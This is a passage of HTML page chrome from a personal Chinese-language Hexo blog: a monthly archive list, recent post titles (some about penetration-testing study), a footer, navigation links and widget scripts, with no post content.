      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/08/">August 2023</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/05/">May 2023</a><span class="archive-list-count">5</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/04/">April 2023</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/03/">March 2023</a><span class="archive-list-count">4</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/02/">February 2023</a><span class="archive-list-count">10</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/01/">January 2023</a><span class="archive-list-count">12</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/12/">December 2022</a><span class="archive-list-count">8</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/11/">November 2022</a><span class="archive-list-count">6</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/10/">October 2022</a><span class="archive-list-count">5</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/09/">September 2022</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/08/">August 2022</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/07/">July 2022</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/06/">June 2022</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/05/">May 2022</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/04/">April 2022</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/03/">March 2022</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/01/">January 2022</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/09/">September 2021</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/07/">July 2021</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/04/">April 2021</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/03/">March 2021</a><span class="archive-list-count">1</span></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2023/08/12/Penetration%20testing/%E5%AD%A6%E4%B9%A0%E6%80%9D%E8%80%83/">学习思考</a>
          </li>
        
          <li>
            <a href="/2023/05/14/learning%20share/%E8%B4%A7%E8%BF%90%E7%89%A9%E6%B5%81%E8%A1%A8%E7%94%9F%E6%88%90/">货运物流表生成</a>
          </li>
        
          <li>
            <a href="/2023/05/05/Penetration%20testing/vulnhub%E9%9D%B6%E6%9C%BA%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/">vulnhub靶机学习记录</a>
          </li>
        
          <li>
            <a href="/2023/05/04/learning%20share/spring%E5%AD%A6%E4%B9%A0/">spring学习</a>
          </li>
        
          <li>
            <a href="/2023/05/04/learning%20share/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">计算机网络学习笔记</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<footer id="footer">
<span>访问量<span id="busuanzi_value_site_pv"></span>次</span>
    <span class="post-meta-divider">|</span>
    <span>访客<span id="busuanzi_value_site_uv"></span>人</span>
    <span class="post-meta-divider">|</span>
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2023 草莓布丁<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>

    </div>
</div>
</footer>



    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/categories/%E5%AD%A6%E4%B9%A0%E5%88%86%E4%BA%AB/" class="mobile-nav-link">学习分享</a>
  
    <a href="/categories/web%E5%AE%89%E5%85%A8/" class="mobile-nav-link">安全</a>
  
    <a href="/categories/%E5%85%B4%E8%B6%A3/" class="mobile-nav-link">兴趣</a>
  
    <a href="/richang" class="mobile-nav-link">日常</a>
  
</nav>
    

<script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>





  </div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/live2dw/assets/tororo.model.json"},"display":{"position":"right","width":200,"height":300},"mobile":{"show":true},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
<script type="text/javascript" src="http://libs.baidu.com/jquery/1.8.3/jquery.js"></script>
<script type="text/javascript" src="http://libs.baidu.com/jquery/1.8.3/jquery.min.js"></script>
<!-- 雪花特效 -->
<script type="text/javascript" src="\js\snow.js"></script>
</html>